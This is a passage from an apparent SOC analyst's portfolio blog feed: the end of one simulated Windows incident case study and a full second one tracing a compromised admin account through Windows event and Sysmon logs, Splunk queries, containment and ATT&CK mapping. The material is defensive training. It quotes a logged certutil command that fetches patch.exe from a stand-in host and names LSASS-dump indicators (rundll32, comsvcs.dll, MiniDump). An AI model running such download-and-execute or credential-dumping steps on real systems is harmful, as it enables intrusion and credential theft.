  <li>Additional payloads</li>
  <li>Suspicious child processes</li>
</ul>

<hr />

<h1 id="14-lessons-learned">14. Lessons Learned</h1>

<p>Several detection opportunities exist within this attack chain.</p>

<h3 id="identity-based-detection">Identity-based detection</h3>

<p>A finance user querying:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<p>should receive additional scrutiny when it occurs outside normal administrative workflows.</p>

<h3 id="remote-powershell-monitoring">Remote PowerShell monitoring</h3>

<p>A network logon followed by:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wsmprovhost.exe
    ↓
powershell.exe
</code></pre></div></div>

<p>should be correlated with the account, source workstation, and expected administrative activity.</p>

<h3 id="payload-execution-detection">Payload execution detection</h3>

<p>A sequence such as:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Invoke-WebRequest
      ↓
Sysmon Event 11
      ↓
New executable
      ↓
Sysmon Event 1
      ↓
External connection
</code></pre></div></div>

<p>is highly valuable for automated detection.</p>

<h3 id="credential-dumping-detection">Credential dumping detection</h3>

<p>Execution involving:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>rundll32.exe
comsvcs.dll
MiniDump
</code></pre></div></div>

<p>should receive high priority because of its relationship to LSASS memory dumping.</p>

<h3 id="sensitive-file-monitoring">Sensitive file monitoring</h3>

<p>Read/write access to high-value finance files should be correlated with:</p>

<ul>
  <li>User identity</li>
  <li>Source workstation</li>
  <li>Authentication type</li>
  <li>Recent endpoint activity</li>
  <li>Network activity</li>
</ul>

<hr />

<h1 id="15-key-soc-takeaways">15. Key SOC Takeaways</h1>

<p>This investigation reinforced several important SOC principles.</p>

<h3 id="1-suspicious-does-not-mean-compromised">1. Suspicious does not mean compromised</h3>

<p>The first suspicious command was:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<p>but the command alone was not sufficient to declare an incident.</p>

<h3 id="2-context-matters">2. Context matters</h3>

<p>The same PowerShell command can be legitimate in one context and highly suspicious in another.</p>

<h3 id="3-missing-telemetry-creates-uncertainty">3. Missing telemetry creates uncertainty</h3>

<p>Because the beginning of the compromise was not visible, the investigation had to distinguish between:</p>

<p><strong>What we know</strong></p>

<p>and</p>

<p><strong>What we suspect.</strong></p>

<h3 id="4-correlation-is-more-powerful-than-isolated-events">4. Correlation is more powerful than isolated events</h3>

<p>The individual events become much more meaningful when connected:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Network Logon
      ↓
Remote PowerShell
      ↓
AD Discovery
      ↓
Payload Download
      ↓
Payload Execution
      ↓
C2 Communication
      ↓
LSASS Dump
      ↓
Defense Evasion
      ↓
File Server Access
      ↓
Sensitive Data Access
      ↓
Archive Creation
      ↓
Potential Exfiltration
</code></pre></div></div>

<h3 id="5-scope-must-be-precise">5. Scope must be precise</h3>

<p>A system can be:</p>

<ul>
  <li>Confirmed compromised</li>
  <li>Potentially compromised</li>
  <li>Affected by unauthorized activity</li>
</ul>

<p>These classifications should not be treated as interchangeable.</p>

<hr />

<h1 id="conclusion">Conclusion</h1>

<p>This investigation was designed to simulate a realistic SOC scenario where the initial stage of an attack is missing from the available telemetry.</p>

<p>The investigation began with activity that could potentially be legitimate but gradually escalated into a clear compromise involving:</p>

<ul>
  <li>Active Directory reconnaissance</li>
  <li>Remote PowerShell</li>
  <li>External payload delivery</li>
  <li>Malware execution</li>
  <li>Command-and-control communication</li>
  <li>LSASS credential dumping</li>
  <li>Defense evasion</li>
  <li>File server access</li>
  <li>Sensitive payroll data access</li>
  <li>Archive creation</li>
  <li>Potential data exfiltration</li>
</ul>

<p>The most important lesson from this exercise was not simply identifying malicious commands.</p>

<p>It was learning to <strong>build an evidence-based attack narrative while clearly separating confirmed facts from investigative hypotheses</strong>.</p>

<p>That is a core skill in practical SOC analysis.</p>

<hr />

<h2 id="skills-demonstrated">Skills Demonstrated</h2>

<ul>
  <li>Splunk SIEM investigation</li>
  <li>Windows Event Log analysis</li>
  <li>PowerShell 4104 analysis</li>
  <li>Process-chain reconstruction</li>
  <li>Logon investigation</li>
  <li>Kerberos telemetry analysis</li>
  <li>Sysmon analysis</li>
  <li>Credential-access detection</li>
  <li>Lateral movement investigation</li>
  <li>Data-access investigation</li>
  <li>Incident classification</li>
  <li>Scope assessment</li>
  <li>Containment planning</li>
  <li>Threat hunting</li>
  <li>Evidence-based incident reporting</li>
</ul>

<hr />

<h2 id="author">Author</h2>

<p><strong>Precious Anyanwu</strong></p>

<table>
  <tbody>
    <tr>
      <td>Entry-Level SOC Analyst</td>
      <td>Cloud Security</td>
      <td>CompTIA Security+</td>
      <td>AWS Certified</td>
      <td>ISC2 CC</td>
    </tr>
  </tbody>
</table>

<p><a href="https://github.com/precious-anyanwu">GitHub</a></p>]]></content><author><name>Precious Cyber6ixxx</name></author><summary type="html"><![CDATA[SOC Investigation Case Study: The Missing Beginning]]></summary></entry><entry><title type="html">Soc Investigation Case Study The Compromised Administrator</title><link href="/2026/08/09/SOC-Investigation-Case-Study-The-Compromised-Administrator.html" rel="alternate" type="text/html" title="Soc Investigation Case Study The Compromised Administrator" /><published>2026-08-09T00:00:00+00:00</published><updated>2026-08-09T00:00:00+00:00</updated><id>/2026/08/09/SOC-Investigation-Case-Study-The-Compromised-Administrator</id><content type="html" xml:base="/2026/08/09/SOC-Investigation-Case-Study-The-Compromised-Administrator.html"><![CDATA[<h1 id="soc-investigation-case-study--the-compromised-administrator">SOC Investigation Case Study — The Compromised Administrator</h1>

<h2 id="investigation-objective">Investigation Objective</h2>

<p>This exercise simulates a potential compromise involving a privileged IT administrator account and multiple Windows systems.</p>

<p>The objective was to determine where legitimate administrative activity transitioned into suspicious behavior, identify the point at which the activity became a confirmed security incident, reconstruct the attack chain, and determine the appropriate SOC response.</p>

<p>The investigation focused on:</p>

<ul>
  <li>Windows authentication telemetry</li>
  <li>PowerShell Script Block Logging</li>
  <li>Active Directory reconnaissance</li>
  <li>Kerberos service-ticket activity</li>
  <li>Remote administration and lateral movement</li>
  <li>Suspicious outbound network connections</li>
  <li>LOLBin abuse through <code class="language-plaintext highlighter-rouge">certutil.exe</code></li>
  <li>Malicious file creation and execution</li>
  <li>Splunk investigation and telemetry correlation</li>
</ul>

<hr />

<h1 id="environment">Environment</h1>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT20
User workstation
      |
      | ITAdmin01
      ↓
CLIENT21
Administrative workstation
      |
      ↓
DC01
Domain Controller
      |
      ↓
FILESERVER01
Finance File Server
</code></pre></div></div>

<hr />

<h1 id="telemetry-under-investigation">Telemetry Under Investigation</h1>

<p>The following telemetry represents the complete sequence available to the SOC analyst.</p>

<h3 id="event-1--091703--client20">Event 1 — 09:17:03 — CLIENT20</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4624

Account: ITAdmin01
Logon Type: 2
</code></pre></div></div>

<p>Interactive logon by the administrative account.</p>

<hr />

<h3 id="event-2--091711--client20">Event 2 — 09:17:11 — CLIENT20</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4688

mmc.exe

Command:
compmgmt.msc
</code></pre></div></div>

<p>The administrator opens Computer Management.</p>

<p>At this stage, the activity can reasonably be considered legitimate administrative behavior.</p>

<hr />

<h3 id="event-3--091804--client20">Event 3 — 09:18:04 — CLIENT20</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4104

Get-Service
</code></pre></div></div>

<p>PowerShell enumerates services.</p>

<hr />

<h3 id="event-4--091819--client20">Event 4 — 09:18:19 — CLIENT20</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4104

Get-Process
</code></pre></div></div>

<p>PowerShell enumerates running processes.</p>

<p>These commands are not inherently malicious and can commonly occur during system administration or troubleshooting.</p>

<hr />

<h3 id="event-5--091902--client20">Event 5 — 09:19:02 — CLIENT20</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4104

Get-ADComputer -Filter *
</code></pre></div></div>

<p>The account begins broad Active Directory computer discovery.</p>

<hr />

<h3 id="event-6--091921--client20">Event 6 — 09:19:21 — CLIENT20</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4104

Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<p>The account specifically queries membership of the highly privileged Domain Admins group.</p>

<p>This substantially increases the level of suspicion.</p>

<hr />

<h3 id="event-7--092007--dc01">Event 7 — 09:20:07 — DC01</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4769

Service:
cifs/CLIENT21

Account:
ITAdmin01
</code></pre></div></div>

<p>A Kerberos service-ticket request is generated for access to CLIENT21.</p>

<p>Given the preceding reconnaissance, this is significant because CLIENT21 appears to have become a target following the discovery activity.</p>

<hr />

<h3 id="event-8--092015--client21">Event 8 — 09:20:15 — CLIENT21</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4624

Account: ITAdmin01
Logon Type: 3

Source:
CLIENT20
</code></pre></div></div>

<p>ITAdmin01 authenticates to CLIENT21 over the network from CLIENT20.</p>

<hr />

<h3 id="event-9--092031--client21">Event 9 — 09:20:31 — CLIENT21</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4688

powershell.exe

Command:
Get-ChildItem C:\Users
</code></pre></div></div>

<p>PowerShell begins further discovery on CLIENT21.</p>

<hr />

<h3 id="event-10--092104--client21">Event 10 — 09:21:04 — CLIENT21</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4104

Get-LocalGroupMember Administrators
</code></pre></div></div>

<p>The account investigates local administrator membership on CLIENT21.</p>

<hr />

<h3 id="event-11--092147--client21">Event 11 — 09:21:47 — CLIENT21</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sysmon Event 3

powershell.exe
        ↓
10.10.10.50:443
</code></pre></div></div>

<p>PowerShell establishes an outbound HTTPS connection.</p>

<p>By itself, an outbound connection over TCP/443 is not sufficient to establish maliciousness. However, its position immediately after administrative and privilege reconnaissance makes it highly relevant.</p>

<hr />

<h3 id="event-12--092202--client21">Event 12 — 09:22:02 — CLIENT21</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4688

certutil.exe

Command:

-urlcache -split -f
https://updates-example.com/patch.exe
C:\ProgramData\patch.exe
</code></pre></div></div>

<p>This is a major escalation point.</p>

<p><code class="language-plaintext highlighter-rouge">certutil.exe</code> is a legitimate Windows utility, but its ability to retrieve files can be abused by attackers as a <strong>Living-off-the-Land Binary (LOLBin)</strong>.</p>

<p>The command downloads an executable directly into:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\ProgramData\patch.exe
</code></pre></div></div>

<hr />

<h3 id="event-13--092218--client21">Event 13 — 09:22:18 — CLIENT21</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sysmon Event 11

File Created

C:\ProgramData\patch.exe
</code></pre></div></div>

<p>The suspicious executable is confirmed to have been written to disk.</p>

<hr />

<h3 id="event-14--092246--client21">Event 14 — 09:22:46 — CLIENT21</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4688

patch.exe
</code></pre></div></div>

<p>The downloaded executable is executed.</p>

<p>This provides substantially stronger evidence of compromise than the preceding download alone.</p>

<hr />

<h3 id="event-15--092312--client21">Event 15 — 09:23:12 — CLIENT21</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sysmon Event 3

patch.exe
        ↓
10.10.10.50:443
</code></pre></div></div>

<p>The newly executed executable establishes an outbound connection to the same external destination.</p>

<p>The sequence now resembles:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PowerShell
    ↓
External connection
    ↓
certutil.exe
    ↓
Download executable
    ↓
patch.exe created
    ↓
patch.exe executed
    ↓
Outbound network connection
</code></pre></div></div>

<p>This is highly consistent with malicious execution and potential command-and-control or payload communication.</p>

<hr />

<h1 id="1-where-does-legitimate-activity-end">1. Where Does Legitimate Activity End?</h1>

<p>My initial assessment is that the first clearly suspicious phase begins with:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ADComputer -Filter *
</code></pre></div></div>

<p>followed shortly by:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<p>However, I would not automatically classify <code class="language-plaintext highlighter-rouge">Get-Service</code> or <code class="language-plaintext highlighter-rouge">Get-Process</code> as malicious.</p>

<p>Both are common administrative commands.</p>

<p>The important distinction is <strong>context</strong>.</p>

<p>A privileged IT administrator performing:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-Service
Get-Process
</code></pre></div></div>

<p>could simply be troubleshooting a workstation.</p>

<p>The behavior becomes considerably more concerning when the same account progresses into:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>AD computer enumeration
        ↓
Domain Admin enumeration
        ↓
Kerberos access to CLIENT21
        ↓
Remote authentication
        ↓
Further privilege discovery
</code></pre></div></div>

<p>Therefore, I would describe the transition as:</p>

<blockquote>
  <p><strong>Legitimate administrative activity → suspicious reconnaissance → confirmed malicious execution.</strong></p>
</blockquote>

<hr />

<h1 id="2-first-point-of-suspicion">2. First Point of Suspicion</h1>

<p>My first strong point of suspicion is:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:19:21
Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<p>This command is not inherently malicious. Administrators may legitimately query privileged groups.</p>

<p>However, the context makes it significant.</p>

<p>The account had just performed broad computer discovery:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ADComputer -Filter *
</code></pre></div></div>

<p>and immediately followed it with:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<p>This combination suggests the account may be attempting to understand:</p>

<ol>
  <li>What systems exist?</li>
  <li>Which accounts have high privileges?</li>
  <li>Which targets may provide greater access?</li>
</ol>

<p>The subsequent Kerberos request for:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cifs/CLIENT21
</code></pre></div></div>

<p>and network authentication from CLIENT20 to CLIENT21 strengthens that hypothesis.</p>

<hr />

<h1 id="3-when-does-this-become-an-incident">3. When Does This Become an Incident?</h1>

<p>The <code class="language-plaintext highlighter-rouge">certutil.exe</code> download at:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:22:02
</code></pre></div></div>

<p>is a major escalation point and would warrant immediate investigation and likely incident escalation.</p>

<p>However, the strongest point for declaring a confirmed security incident is:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:22:46

patch.exe
</code></pre></div></div>

<p>At this point, the suspicious executable has:</p>

<ol>
  <li>Been downloaded</li>
  <li>Been written to disk</li>
  <li>Been executed</li>
</ol>

<p>The subsequent network connection from <code class="language-plaintext highlighter-rouge">patch.exe</code> to:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>10.10.10.50:443
</code></pre></div></div>

<p>further strengthens the conclusion.</p>

<p>Therefore:</p>

<blockquote>
  <p><strong>I would move from suspicious investigation to confirmed incident once <code class="language-plaintext highlighter-rouge">patch.exe</code> executes, supported by the preceding download and subsequent network communication.</strong></p>
</blockquote>

<hr />

<h1 id="4-primary-affected-host">4. Primary Affected Host</h1>

<h2 id="client21">CLIENT21</h2>

<p>CLIENT21 is the primary affected host.</p>

<p>The attack progression on this system is:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ITAdmin01
     ↓
Network authentication
     ↓
PowerShell discovery
     ↓
Local administrator enumeration
     ↓
Outbound connection
     ↓
certutil download
     ↓
patch.exe created
     ↓
patch.exe executed
     ↓
Outbound communication
</code></pre></div></div>

<p>CLIENT20 should also remain in scope because it is the initial workstation associated with the suspicious administrative activity.</p>

<p>The ITAdmin01 account is also considered compromised or potentially compromised until its legitimacy can be established.</p>

<hr />

<h1 id="5-initial-splunk-investigation">5. Initial Splunk Investigation</h1>

<p>My first investigation would pivot around the affected account:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ITAdmin01
</code></pre></div></div>

<p>I would establish where and when the account authenticated before and after the observed sequence.</p>

<p>For example:</p>

<pre><code class="language-spl">index=wineventlog Account_Name="ITAdmin01"
| table _time host EventCode Account_Name Logon_Type Source_Network_Address Process_Name CommandLine
| sort _time
</code></pre>

<p>The objective is to establish:</p>

<ul>
  <li>Which systems ITAdmin01 accessed</li>
  <li>When those accesses occurred</li>
  <li>Where the account originated</li>
  <li>Whether CLIENT20 was the normal source</li>
  <li>Whether other systems were accessed</li>
  <li>Whether suspicious activity occurred outside the observed window</li>
</ul>

<hr />

<h1 id="6-logonguid-pivot">6. LogonGUID Pivot</h1>

<p>Once the relevant <code class="language-plaintext highlighter-rouge">4624</code> authentication event is identified, I would pivot using the associated <code class="language-plaintext highlighter-rouge">LogonGUID</code>.</p>

<p>The purpose is to determine what activity occurred within the relevant authentication context.</p>

<p>Conceptually:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4624
  ↓
LogonGUID
  ↓
Process creation
  ↓
PowerShell
  ↓
Network activity
</code></pre></div></div>

<p>This helps separate activity associated with the relevant user session from unrelated events occurring on the same host.</p>

<hr />

<h1 id="7-processguid-pivot">7. ProcessGUID Pivot</h1>

<p>Where Sysmon telemetry is available, I would also use <code class="language-plaintext highlighter-rouge">ProcessGUID</code>.</p>

<p>This answers a different question.</p>

<h3 id="logonguid">LogonGUID</h3>

<p>Helps establish:</p>

<blockquote>
  <p>Which activity belongs to this authentication/session?</p>
</blockquote>

<h3 id="processguid">ProcessGUID</h3>

<p>Helps establish:</p>

<blockquote>
  <p>Which process generated or spawned this activity?</p>
</blockquote>

<p>For example:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>powershell.exe
      ↓
ProcessGUID
      ↓
child process
      ↓
network activity
</code></pre></div></div>

<p>Using both pivots provides stronger correlation than relying on either identifier alone.</p>

<hr />

<h1 id="8-additional-telemetry">8. Additional Telemetry</h1>

<p>After confirming the suspicious execution, I would immediately expand the investigation.</p>

<h3 id="authentication--4624--4625">Authentication — 4624 / 4625</h3>

<p>I would determine:</p>

<ul>
  <li>Where ITAdmin01 authenticated</li>
  <li>Whether there were failed logons</li>
  <li>Whether authentication originated from unusual systems</li>
  <li>Whether other accounts were used from CLIENT20 or CLIENT21</li>
</ul>

<h3 id="privileged-logon--4672">Privileged Logon — 4672</h3>

<p>I would determine whether the account received special privileges during the relevant session.</p>

<p>This helps establish the potential impact of the compromised administrative account.</p>

<h3 id="powershell--4104">PowerShell — 4104</h3>

<p>I would investigate the complete PowerShell activity before and after the download.</p>

<p>I would specifically look for:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Invoke-WebRequest
IEX
DownloadString
Encoded commands
Obfuscation
Credential access
Persistence
</code></pre></div></div>

<h3 id="process-creation--4688--sysmon-event-1">Process Creation — 4688 / Sysmon Event 1</h3>

<p>I would reconstruct the complete process tree surrounding:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>certutil.exe
patch.exe
powershell.exe
</code></pre></div></div>

<p>The objective is to establish parent-child relationships and identify additional processes that may have executed.</p>

<h3 id="network-telemetry--sysmon-event-3">Network Telemetry — Sysmon Event 3</h3>

<p>I would investigate:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>10.10.10.50:443
</code></pre></div></div>

<p>and determine:</p>

<ul>
  <li>Which process connected to it</li>
  <li>When communication began</li>
  <li>Whether communication continued</li>
  <li>Whether other systems contacted the same destination</li>
</ul>

<h3 id="dns--sysmon-event-22">DNS — Sysmon Event 22</h3>

<p>If DNS telemetry is available, I would determine what hostname resolves to the destination and whether the domain has appeared elsewhere in the environment.</p>

<h3 id="file-creation--sysmon-event-11">File Creation — Sysmon Event 11</h3>

<p>I would investigate:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\ProgramData\patch.exe
</code></pre></div></div>

<p>including:</p>

<ul>
  <li>File hash</li>
  <li>Creation time</li>
  <li>Parent process</li>
  <li>Digital signature</li>
  <li>File metadata</li>
  <li>Whether similar files exist elsewhere</li>
</ul>

<h3 id="persistence">Persistence</h3>

<p>I would investigate whether the attacker attempted to maintain access through:</p>

<ul>
  <li>Scheduled tasks</li>
  <li>Services</li>
  <li>Registry Run keys</li>
  <li>WMI</li>
  <li>Startup folders</li>
  <li>Other autorun mechanisms</li>
</ul>

<hr />

<h1 id="9-containment">9. Containment</h1>

<p>My first containment priority would be:</p>

<h2 id="isolate-client21">Isolate CLIENT21</h2>

<p>CLIENT21 has the strongest evidence of active compromise because the malicious executable has been downloaded and executed.</p>

<p>Isolation would prevent:</p>

<ul>
  <li>Further command-and-control communication</li>
  <li>Additional payload retrieval</li>
  <li>Lateral movement</li>
  <li>Credential theft</li>
  <li>Further compromise of internal systems</li>
</ul>

<p>I would avoid simply shutting the system down if forensic preservation is required, because volatile evidence may be valuable.</p>

<hr />

<h2 id="disable-or-restrict-itadmin01">Disable or Restrict ITAdmin01</h2>

<p>I would temporarily disable or restrict the account, subject to the organization’s incident-response procedures.</p>

<p>I would also:</p>

<ul>
  <li>Revoke active sessions</li>
  <li>Reset credentials</li>
  <li>Invalidate authentication tokens where applicable</li>
  <li>Investigate credential exposure</li>
  <li>Review where the account authenticated</li>
</ul>

<p>Because ITAdmin01 is an administrative account, its compromise could significantly expand the potential scope of the incident.</p>

<hr />

<h1 id="10-why-client20-also-matters">10. Why CLIENT20 Also Matters</h1>

<p>CLIENT20 should not simply be treated as the harmless starting point.</p>

<p>It is the system where:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ITAdmin01
      ↓
PowerShell
      ↓
AD reconnaissance
      ↓
CLIENT21 targeting
</code></pre></div></div>

<p>began.</p>

<p>I would therefore investigate CLIENT20 for:</p>

<ul>
  <li>Initial access</li>
  <li>Malware execution</li>
  <li>Suspicious PowerShell</li>
  <li>Credential theft</li>
  <li>Persistence</li>
  <li>Unusual logons</li>
  <li>External connections</li>
  <li>Evidence of attacker-controlled activity</li>
</ul>

<p>The investigation should determine whether CLIENT20 was the original compromised host or merely the workstation used by a legitimate administrator.</p>

<hr />

<h1 id="11-attack-chain-reconstruction">11. Attack Chain Reconstruction</h1>

<p>Based on the available telemetry, the likely sequence is:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ITAdmin01 logs onto CLIENT20
             ↓
      PowerShell execution
             ↓
      System discovery
             ↓
   AD computer enumeration
             ↓
 Domain Admin enumeration
             ↓
   CLIENT21 identified
             ↓
 Kerberos ticket request
             ↓
 CLIENT20 → CLIENT21
   network authentication
             ↓
      PowerShell discovery
             ↓
 Local administrator enumeration
             ↓
   External network connection
             ↓
       certutil.exe
             ↓
 Download patch.exe
             ↓
 patch.exe written to disk
             ↓
    patch.exe executed
             ↓
 patch.exe → 10.10.10.50:443
             ↓
 Potential C2 / payload communication
</code></pre></div></div>

<p>This represents a progression from <strong>reconnaissance → targeting → remote access → payload delivery → execution → network communication</strong>.</p>

<hr />

<h1 id="12-mitre-attck-relevance">12. MITRE ATT&amp;CK Relevance</h1>

<p>Several behaviors in this investigation map naturally to MITRE ATT&amp;CK techniques.</p>

<table>
  <thead>
    <tr>
      <th>Activity</th>
      <th>ATT&amp;CK Relevance</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">Get-ADComputer -Filter *</code></td>
      <td>System/Network Discovery</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">Get-ADGroupMember "Domain Admins"</code></td>
      <td>Permission/Account Discovery</td>
    </tr>
    <tr>
      <td>Remote authentication to CLIENT21</td>
      <td>Remote Services</td>
    </tr>
    <tr>
      <td>PowerShell execution</td>
      <td>Command and Scripting Interpreter: PowerShell</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">certutil.exe</code> download</td>
      <td>Ingress Tool Transfer / LOLBin abuse</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">patch.exe</code> execution</td>
      <td>User Execution / Command Execution context</td>
    </tr>
    <tr>
      <td>Outbound HTTPS communication</td>
      <td>Application Layer Protocol: Web Protocols</td>
    </tr>
    <tr>
      <td>Potential credential targeting</td>
      <td>Credential Access</td>
    </tr>
    <tr>
      <td>Administrative account abuse</td>
      <td>Valid Accounts</td>
    </tr>
  </tbody>
</table>

<p>The exact ATT&amp;CK mapping would depend on additional telemetry and confirmed attacker objectives.</p>

<hr />

<h1 id="13-detection-opportunities">13. Detection Opportunities</h1>

<p>This investigation demonstrates several opportunities for SIEM detection engineering.</p>

<p>A useful detection strategy would not alert simply because:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ADComputer -Filter *
</code></pre></div></div>

<p>was executed.</p>

<p>Instead, higher fidelity could come from correlating multiple behaviors:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Privileged account
        +
AD reconnaissance
        +
Remote authentication
        +
Suspicious PowerShell
        +
External network connection
        +
LOLBin download
        +
Executable creation
        +
Executable execution
</code></pre></div></div>

<p>The combination is significantly more suspicious than any individual event.</p>

<hr />

<h1 id="14-key-soc-lesson">14. Key SOC Lesson</h1>

<p>The most important lesson from this exercise is that <strong>context matters more than individual events</strong>.</p>

<p>For example:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-Process
</code></pre></div></div>

<p>is normal.</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ADComputer -Filter *
</code></pre></div></div>

<p>can be legitimate.</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<p>can also be legitimate.</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>certutil.exe
</code></pre></div></div>

<p>is a legitimate Windows utility.</p>

<p>HTTPS traffic on port 443 is normal.</p>

<p>But when these behaviors occur sequentially:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Discovery
   ↓
Privileged target identification
   ↓
Remote access
   ↓
Payload download
   ↓
Executable creation
   ↓
Execution
   ↓
External communication
</code></pre></div></div>

<p>the combined evidence tells a very different story.</p>

<p>This is the type of contextual reasoning required during real SOC investigations.</p>

<hr />

<h1 id="conclusion">Conclusion</h1>

<p>This exercise reinforced the importance of distinguishing <strong>legitimate administrative activity from malicious behavior occurring through legitimate tools</strong>.</p>

<p>The investigation began with an administrative account performing activity that could initially appear normal. Contextual analysis revealed increasingly suspicious Active Directory reconnaissance, remote access to an administrative workstation, LOLBin-based payload delivery, executable creation, execution, and subsequent outbound communication.</p>

<p>The strongest evidence of compromise occurred when:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>certutil.exe
      ↓
patch.exe
      ↓
execution
      ↓
external communication
</code></pre></div></div>

<p>was observed on CLIENT21.</p>

<p>The investigation therefore demonstrates a complete SOC workflow:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Observe
   ↓
Establish baseline
   ↓
Identify anomaly
   ↓
Correlate telemetry
   ↓
Reconstruct attack chain
   ↓
Confirm compromise
   ↓
Scope affected assets
   ↓
Contain
   ↓
Investigate and recover
</code></pre></div></div>

<p>The exercise strengthened my practical understanding of Windows telemetry, Splunk investigation, PowerShell analysis, Active Directory reconnaissance, LOLBin abuse, process correlation, and incident-response decision making.</p>

<hr />

<h2 id="author">Author</h2>

<p><strong>Precious Ifeanyi Anyanwu</strong></p>

<table>
  <tbody>
    <tr>
      <td>Entry-Level SOC Analyst</td>
      <td>Cloud Security</td>
      <td>CompTIA Security+</td>
      <td>AWS Certified</td>
      <td>ISC2 CC</td>
    </tr>
  </tbody>
</table>

<h2 id="github--linkedin"><a href="https://github.com/precious-anyanwu">GitHub</a> | <a href="http://linkedin.com/in/precious-anyanwu-627309291">LinkedIn</a></h2>

<h3 id="key-skills-demonstrated">Key Skills Demonstrated</h3>

<p><code class="language-plaintext highlighter-rouge">Splunk</code> <code class="language-plaintext highlighter-rouge">Windows Event Logs</code> <code class="language-plaintext highlighter-rouge">PowerShell</code> <code class="language-plaintext highlighter-rouge">Sysmon</code> <code class="language-plaintext highlighter-rouge">Threat Hunting</code> <code class="language-plaintext highlighter-rouge">Incident Response</code> <code class="language-plaintext highlighter-rouge">Active Directory</code> <code class="language-plaintext highlighter-rouge">MITRE ATT&amp;CK</code> <code class="language-plaintext highlighter-rouge">Process Correlation</code> <code class="language-plaintext highlighter-rouge">SIEM Detection</code></p>]]></content><author><name>Precious Cyber6ixxx</name></author><summary type="html"><![CDATA[SOC Investigation Case Study — The Compromised Administrator]]></summary></entry><entry><title type="html">Soc Investigation Case Study The Administrator And The Intruder</title><link href="/2026/08/08/SOC-Investigation-Case-Study-The-Administrator-and-the-Intruder.html" rel="alternate" type="text/html" title="Soc Investigation Case Study The Administrator And The Intruder" 